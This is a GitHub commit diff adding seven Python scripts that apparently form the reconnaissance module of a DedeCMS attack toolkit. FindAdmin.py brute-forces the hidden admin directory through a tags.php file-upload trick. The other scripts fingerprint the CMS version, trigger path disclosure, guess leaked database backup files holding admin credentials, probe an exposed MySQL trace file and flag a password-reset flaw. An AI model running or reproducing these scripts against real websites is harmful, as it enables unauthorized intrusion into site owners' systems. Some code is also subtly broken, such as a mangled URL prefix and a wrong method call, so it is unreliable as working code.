Add files via upload

Mr-xn · Aug 16, 2019 · b4d691a · b4d691a
1 parent 880a7b2
commit b4d691a
Show file tree

Hide file tree

Showing 7 changed files with 258 additions and 0 deletions.
diff --git a/info/FindAdmin.py b/info/FindAdmin.py
@@ -0,0 +1,63 @@
+import requests
+import itertools
+from termcolor import cprint
+
+class FindAdmin:
+
+ def __init__(self,url):
+ self.url = url
+
+ def findadmin(self):
+ try:
+ characters = "abcdefghijklmnopqrstuvwxyz0123456789_!#"
+ back_dir = ""
+ flag = 0
+ if ':https://' not in self.url:
+ self.url = 'http:https://' + self.url + '/'
+ url = self.url
+ vulnurl = url + "/tags.php"
+ payload = '/dede'
+ r = requests.get(url=url+payload)
+ if r.status_code == 200:
+ back_dir = url + payload
+ else:
+ data = {
+ "_FILES[mochazz][tmp_name]": "./{p}<</images/adminico.gif",
+ "_FILES[mochazz][name]": 0,
+ "_FILES[mochazz][size]": 0,
+ "_FILES[mochazz][type]": "image/gif"
+ }
+ for num in range(1, 7):
+ if flag:
+ break
+ for pre in itertools.permutations(characters, num):
+ pre = ''.join(list(pre))
+ data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=pre)
+ r = requests.post(vulnurl, data=data)
+ if "Upload filetype not allow !" not in r.text and r.status_code == 200:
+ flag = 1
+ back_dir = pre
+ data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
+ break
+ else:
+ data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
+ flag = 0
+ for i in range(30):
+ if flag:
+ break
+ for ch in characters:
+ if ch == characters[-1]:
+ flag = 1
+ break
+ data["_FILES[mochazz][tmp_name]"] = data["_FILES[mochazz][tmp_name]"].format(p=back_dir + ch)
+ r = requests.post(url, data=data)
+ if "Upload filetype not allow !" not in r.text and r.status_code == 200:
+ back_dir += ch
+ data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
+ break
+ else:
+ data["_FILES[mochazz][tmp_name]"] = "./{p}<</images/adminico.gif"
+
+ cprint("find dedeadmin is ：" + back_dir,"red")
+ except:
+ return False
diff --git a/info/GetVersion.py b/info/GetVersion.py
@@ -0,0 +1,72 @@
+import requests
+from termcolor import cprint
+import re
+
+
+class GetVersion:
+
+ def __init__(self,url):
+ self.url = url
+
+
+
+ def version(self):
+
+ def cheakver(arg):
+ ver_histroy = {'20080307': 'v3 or v4 or v5',
+ '20080324': 'v5 above',
+ '20080807': '5.1 or 5.2',
+ '20081009': 'v5.1sp',
+ '20081218': '5.1sp',
+ '20090810': '5.5',
+ '20090912': '5.5',
+ '20100803': '5.6',
+ '20101021': '5.3',
+ '20111111': 'v5.7 or v5.6 or v5.5',
+ '20111205': '5.7.18',
+ '20111209': '5.6',
+ '20120430': '5.7SP or 5.7 or 5.6',
+ '20120621': '5.7SP1 or 5.7 or 5.6',
+ '20120709': '5.6',
+ '20121030': '5.7SP1 or 5.7',
+ '20121107': '5.7',
+ '20130608': 'V5.6-Final',
+ '20130922': 'V5.7SP1',
+ '20140225': 'V5.6SP1',
+ '20140725': 'V5.7SP1',
+ '20150618': '5.7',
+ '20180109': 'V5.7SP2'
+ }
+ ver_list = sorted(list(ver_histroy.keys()))#将键变成列表，并排序
+ ver_list.append(arg)#将参数加到末尾
+ sorted_ver_list = sorted(ver_list)#重新排序
+ return ver_histroy[ver_list[sorted_ver_list.index(arg) ]]#判断是否在其中，并返回其值
+
+ headers = {
+ "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
+ "Content-Type":"application/x-www-form-urlencoded",
+ "Accept-Encoding": "gzip, deflate"
+ }
+ payload = "/data/admin/ver.txt"
+ if ':https://' not in self.url:
+ self.url = 'http:https://' + self.url + '/'
+ url = self.url
+ vulnurl = url + payload
+ try:
+ r = requests.get(url=vulnurl,headers=headers)
+ if r.status_code == 200:
+ m = re.search("^(\d+)$", r.text)
+ if m:
+ version = cheakver(m.group(1))
+ msg = "探测到dedecms版本:{} version:{}".format(r.text, version)
+ cprint(msg, "red")
+ except:
+ return False
+
+
+
+
+
+
+
+
diff --git a/info/__init__.py b/info/__init__.py
@@ -0,0 +1 @@
+# -*- coding: utf-8 -*-
diff --git a/info/passwordrest.py b/info/passwordrest.py
@@ -0,0 +1,31 @@
+import requests
+from termcolor import cprint
+
+class passwordres:
+
+ def __init__(self,url):
+
+ self.url = url
+
+ def checkpass(self):
+ headers = {
+ "User-Agent": "Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)",
+ "Content-Type": "application/x-www-form-urlencoded",
+ "Accept-Encoding": "gzip, deflate"
+ }
+ payload = 'member/reg_new.php'
+
+ if ':https://' not in self.url:
+ self.url = 'http:https://' + self.url + '/'
+ url = self.url
+ vulnurl = url + payload
+
+ try:
+ r = requests.get(url=vulnurl,headers=headers)
+
+ if "系统关闭了会员功能" in r.text:
+ return
+ else:
+ cprint("可能存在dede任意用户重置漏洞:https://www.t00ls.net/thread-43689-1-1.html","red")
+ except:
+ return False
diff --git a/info/path.py b/info/path.py
@@ -0,0 +1,37 @@
+import requests
+from termcolor import cprint
+import re
+
+class path:
+
+ def __init__(self,url):
+
+ self.url = url
+
+ def checkpath(self):
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+ }
+ if ':https://' not in self.url:
+ self.url = 'http:https://' + self.url + '/'
+ url = self.url
+ payloads = [
+ 'member/inc/config_pay_yeepay.php',
+ 'member/inc/config_pay_tenpay.php',
+ 'member/inc/config_pay_nps.php ',
+ 'member/inc/config_pay_cbpayment.php ',
+ 'member/inc/config_pay_alipay.php',
+ 'include/downmix.inc.php'
+ ]
+ try:
+
+ for payload in payloads:
+ vulnurl = url + payload
+ r = requests.get(url=vulnurl,headers=headers)
+ if r.status_code == 200:
+ m = re.search('in <b>([^<]+)</b>', r.text)
+ if m:
+ cprint("dedecmd path:" + vulnurl,"red")
+
+ except:
+ return False
diff --git a/info/shortpath.py b/info/shortpath.py
@@ -0,0 +1,29 @@
+import requests
+from termcolor import cprint
+
+
+class shortpath:
+
+ def __init__(self,url):
+ self.url = url
+
+ def shortpath(self):
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+ }
+ payloads = ['/data/backupdata/dede_h~', '/data/backupdata/dede_m~', '/data/backupdata/dede_p~',
+ '/data/backupdata/dede_a~', '/data/backupdata/dede_s~']
+ if ':https://' not in self.url:
+ self.url = 'http:https://' + self.url + '/'
+ url = self.url
+ try:
+ for payload in payloads:
+ for number in range(1, 5):
+ testurl = url.strip() + payload + str(number) + ".txt"
+ r = requests.get(url=testurl,headers=headers)
+ html = r.text
+ if r.status_code == 200 and ("admin" in html or "密码" in html):
+ cprint("dede databak is vulnable" + testurl,"red")
+ except:
+ return False
+
diff --git a/info/trace.py b/info/trace.py
@@ -0,0 +1,25 @@
+import requests
+from termcolor import cprint
+
+
+class trace:
+
+ def __init__(self,url):
+ self.url = url
+
+ def checktrace(self):
+ headers = {
+ "User-Agent": "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
+ }
+ payload = "/data/mysql_error_trace.inc"
+ if ':https://' not in self.url:
+ self.url = 'http:https://' + self.url + '/'
+ url = self.url
+ vulnurl = url + payload
+
+ try:
+ r = requests.get(url=vulnurl,headers=headers)
+ if r.status_code == 200 and r"<?php" in r.text():
+ cprint("mysql trace is vulnable:" + vulnurl,"red")
+ except:
+ return False